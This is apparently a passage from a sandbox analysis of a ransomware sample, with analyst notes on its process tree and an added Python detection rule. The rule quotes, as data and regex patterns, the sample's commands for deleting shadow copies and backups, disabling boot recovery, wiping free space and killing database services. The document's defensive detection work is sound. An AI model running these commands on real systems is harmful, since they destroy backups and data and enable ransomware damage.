C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -pss -s 408 -p 676 -ip 676
C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe [Suspicious use of AdjustPrivilegeToken]
C:\Windows\system32\wbengine.exe | "C:\Windows\system32\wbengine.exe" [Suspicious use of AdjustPrivilegeToken]
C:\Windows\System32\vdsldr.exe | C:\Windows\System32\vdsldr.exe -Embedding
C:\Windows\System32\vds.exe | C:\Windows\System32\vds.exe [Checks SCSI registry key(s)]
C:\Windows\explorer.exe | explorer.exe [Modifies Installed Components in the registry; Modifies registry class; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage]
  C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -u -p 3844 -s 2280 [Program crash]
C:\Windows\system32\WerFault.exe | C:\Windows\system32\WerFault.exe -pss -s 464 -p 3844 -ip 3844
Notes on the tree:
- The sample is a 32-bit image (its direct children are C:\Windows\SysWOW64\cmd.exe), and every system utility is run as SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c <command>. sysnative is the WOW64 alias for the real System32, so taskkill, net, vssadmin, wbadmin, wmic and bcdedit execute as their 64-bit builds instead of being redirected to SysWOW64 copies.
- cipher /w:\\?\C: is the built-in free-space wipe: it overwrites unallocated clusters on C:, so deleted plaintext originals cannot be carved back from disk after the encrypted copies are written.
- Both instances of 64new_cip6.exe carry the System policy modification tag; the second is launched with -network, matching the EnableLinkedConnections = 1 change that exposes the user's mapped drives to the elevated token.
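The command lines in the tree are the part of this report that turns into a detection most cleanly: shadow-copy and backup deletion, boot-recovery changes, a free-space wipe, and a burst of database process and service kills, all issued through the same 32-bit-to-64-bit cmd.exe hop. The following is an added example, not part of the sandbox report: a process-creation rule over (image path, command line) pairs. EVENTS is a constructed subset copied from the tree above plus one benign control line; the rule names, the database name list and the verdict threshold are this example's own choices.

```python
"""Process-creation detection for the recovery-inhibition and service-kill
chain in the tree above. Added example; not part of the sandbox report.
EVENTS is a constructed subset of the tree plus one benign control."""
import re

# Inhibit System Recovery (ATT&CK T1490) command patterns seen in the tree.
RECOVERY_INHIBIT = [
    ("vssadmin_delete_shadows", re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I)),
    ("wmic_shadowcopy",         re.compile(r"wmic(?:\.exe)?\s+shadowcopy", re.I)),
    ("wbadmin_delete_backup",   re.compile(r"wbadmin(?:\.exe)?\s+delete\s+(?:backup|systemstatebackup)", re.I)),
    ("bcdedit_recovery_off",    re.compile(r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I)),
    ("bcdedit_ignore_failures", re.compile(r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I)),
    ("cipher_wipe_free_space",  re.compile(r"cipher(?:\.exe)?\s+/w:", re.I)),
]
# Service Stop (ATT&CK T1489): "taskkill ... -im <image>" or "net stop <service>".
# net1.exe is deliberately not matched so each stop is counted once.
KILL_RX = re.compile(r"taskkill\b.*?[-/]im\s+(\S+)|\bnet\s+stop\s+(\S+)", re.I)
# Database / backup-writer names this sample targets (from the tree).
DB_NAME_RX = re.compile(r"sql|msmd|msdts|reportserver|reportingservices|postgres|pg_ctl|fdhost|fdlauncher|msftesql", re.I)
# 32-bit process hopping to the 64-bit cmd.exe through the WOW64 sysnative alias.
SYSNATIVE_RX = re.compile(r"sysnative\\cmd\.exe", re.I)

# Constructed subset of (image path, command line) pairs from the tree,
# plus one benign control at the end.
EVENTS = [
    (r"C:\Users\Admin\AppData\Local\Temp\64new_cip6.exe", r'"C:\Users\Admin\AppData\Local\Temp\64new_cip6.exe"'),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe"),
    (r"C:\Windows\system32\cmd.exe", r"C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlservr.exe"),
    (r"C:\Windows\system32\taskkill.exe", r"taskkill -f -im sqlservr.exe"),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS"),
    (r"C:\Windows\system32\net.exe", r"net stop MSSQL$ISARS"),
    (r"C:\Windows\system32\net1.exe", r"C:\Windows\system32\net1 stop MSSQL$ISARS"),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet"),
    (r"C:\Windows\system32\vssadmin.exe", r"vssadmin.exe Delete Shadows /All /Quiet"),
    (r"C:\Windows\system32\wbadmin.exe", r"wbadmin delete backup -keepVersions:0 -quiet"),
    (r"C:\Windows\system32\wbadmin.exe", r"wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest"),
    (r"C:\Windows\System32\Wbem\WMIC.exe", r"wmic.exe SHADOWCOPY /nointeractive"),
    (r"C:\Windows\system32\bcdedit.exe", r"bcdedit.exe /set {default} recoveryenabled No"),
    (r"C:\Windows\system32\bcdedit.exe", r"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"),
    (r"C:\Windows\SysWOW64\cipher.exe", r"cipher /w:\\?\C:"),
    (r"C:\Windows\system32\cmd.exe", r"cmd.exe /c dir C:\Users\Admin"),  # constructed benign control
]


def analyze(events):
    """Collect the rule hits over a batch of process-creation events."""
    findings = {"recovery_inhibit": set(), "db_kill_targets": set(), "sysnative_relaunch": 0}
    for image, cmdline in events:
        for name, rx in RECOVERY_INHIBIT:
            if rx.search(cmdline):
                findings["recovery_inhibit"].add(name)
        m = KILL_RX.search(cmdline)
        if m:
            target = m.group(1) or m.group(2)
            if DB_NAME_RX.search(target):
                findings["db_kill_targets"].add(target)
        if image.lower().endswith(r"\syswow64\cmd.exe") and SYSNATIVE_RX.search(cmdline):
            findings["sysnative_relaunch"] += 1
    return findings


def verdict(findings):
    """Two or more distinct recovery-inhibition techniques plus at least one
    database kill is the ransomware-impact pattern of this sample."""
    return len(findings["recovery_inhibit"]) >= 2 and bool(findings["db_kill_targets"])


if __name__ == "__main__":
    f = analyze(EVENTS)
    print(sorted(f["recovery_inhibit"]), sorted(f["db_kill_targets"]), f["sysnative_relaunch"])
    print("ransomware-like:", verdict(f))
```

The wrapper cmd.exe lines match the same patterns as the final utility, so targets are collected into sets rather than counted; the benign dir command matches nothing. The sysnative_relaunch counter is reported separately because on its own it is only a 32-bit-process quirk, but alongside the other hits it ties every command back to one WOW64 parent.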
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.cipher6
  Filesize: 624KB
  MD5: f4c4ed0c4fb6cbf141c1c368aae13447
  SHA1: 2f049e453a19c97698087328c6698e63b89cce1d
  SHA256: 00d56da42bc7cd1717141cc529a8eb12d83d32dfbdffcb91ef4e65d721f8270c
  SHA512: 8994cfe9a0175c5fdfd1f3229de5d3c11534a1271edcfb31df4114cbd20ba81a69c873221bd637aa65054f79a436698d63c49481e7c27be14d1d5ad2f35c1513
Memory dumps (64 files, one per PID):
- memory/380-152-0x0000000000000000-mapping.dmp
- memory/624-136-0x0000000000000000-mapping.dmp
- memory/704-169-0x0000000000000000-mapping.dmp
- memory/772-177-0x0000000000000000-mapping.dmp
- memory/868-171-0x0000000000000000-mapping.dmp
- memory/892-164-0x0000000000000000-mapping.dmp
- memory/932-191-0x0000000000000000-mapping.dmp
- memory/1140-192-0x0000000000000000-mapping.dmp
- memory/1156-193-0x0000000000000000-mapping.dmp
- memory/1424-172-0x0000000000000000-mapping.dmp
- memory/1432-175-0x0000000000000000-mapping.dmp
- memory/1496-162-0x0000000000000000-mapping.dmp
- memory/1504-146-0x0000000000000000-mapping.dmp
- memory/1548-140-0x0000000000000000-mapping.dmp
- memory/1560-145-0x0000000000000000-mapping.dmp
- memory/1568-173-0x0000000000000000-mapping.dmp
- memory/1640-194-0x0000000000000000-mapping.dmp
- memory/1760-163-0x0000000000000000-mapping.dmp
- memory/1792-143-0x0000000000000000-mapping.dmp
- memory/1908-156-0x0000000000000000-mapping.dmp
- memory/1936-147-0x0000000000000000-mapping.dmp
- memory/1980-144-0x0000000000000000-mapping.dmp
- memory/2104-184-0x0000000000000000-mapping.dmp
- memory/2116-139-0x0000000000000000-mapping.dmp
- memory/2120-142-0x0000000000000000-mapping.dmp
- memory/2660-166-0x0000000000000000-mapping.dmp
- memory/2832-190-0x0000000000000000-mapping.dmp
- memory/2948-176-0x0000000000000000-mapping.dmp
- memory/3016-150-0x0000000000000000-mapping.dmp
- memory/3108-165-0x0000000000000000-mapping.dmp
- memory/3208-195-0x0000000000000000-mapping.dmp
- memory/3216-181-0x0000000000000000-mapping.dmp
- memory/3236-133-0x0000000000000000-mapping.dmp
- memory/3280-154-0x0000000000000000-mapping.dmp
- memory/3316-161-0x0000000000000000-mapping.dmp
- memory/3488-170-0x0000000000000000-mapping.dmp
- memory/3500-168-0x0000000000000000-mapping.dmp
- memory/3572-183-0x0000000000000000-mapping.dmp
- memory/3592-187-0x0000000000000000-mapping.dmp
- memory/3656-138-0x0000000000000000-mapping.dmp
- memory/3724-157-0x0000000000000000-mapping.dmp
- memory/3772-160-0x0000000000000000-mapping.dmp
- memory/3776-185-0x0000000000000000-mapping.dmp
- memory/3784-149-0x0000000000000000-mapping.dmp
- memory/3924-134-0x0000000000000000-mapping.dmp
- memory/3932-178-0x0000000000000000-mapping.dmp
- memory/3968-180-0x0000000000000000-mapping.dmp
- memory/4148-141-0x0000000000000000-mapping.dmp
- memory/4224-167-0x0000000000000000-mapping.dmp
- memory/4236-174-0x0000000000000000-mapping.dmp
- memory/4260-158-0x0000000000000000-mapping.dmp
- memory/4288-159-0x0000000000000000-mapping.dmp
- memory/4432-151-0x0000000000000000-mapping.dmp
- memory/4464-179-0x0000000000000000-mapping.dmp
- memory/4488-148-0x0000000000000000-mapping.dmp
- memory/4524-155-0x0000000000000000-mapping.dmp
- memory/4708-188-0x0000000000000000-mapping.dmp
- memory/4736-137-0x0000000000000000-mapping.dmp
- memory/4756-153-0x0000000000000000-mapping.dmp
- memory/4760-135-0x0000000000000000-mapping.dmp
- memory/4836-189-0x0000000000000000-mapping.dmp
- memory/4856-182-0x0000000000000000-mapping.dmp
- memory/5064-186-0x0000000000000000-mapping.dmp
- memory/5068-132-0x0000000000000000-mapping.dmp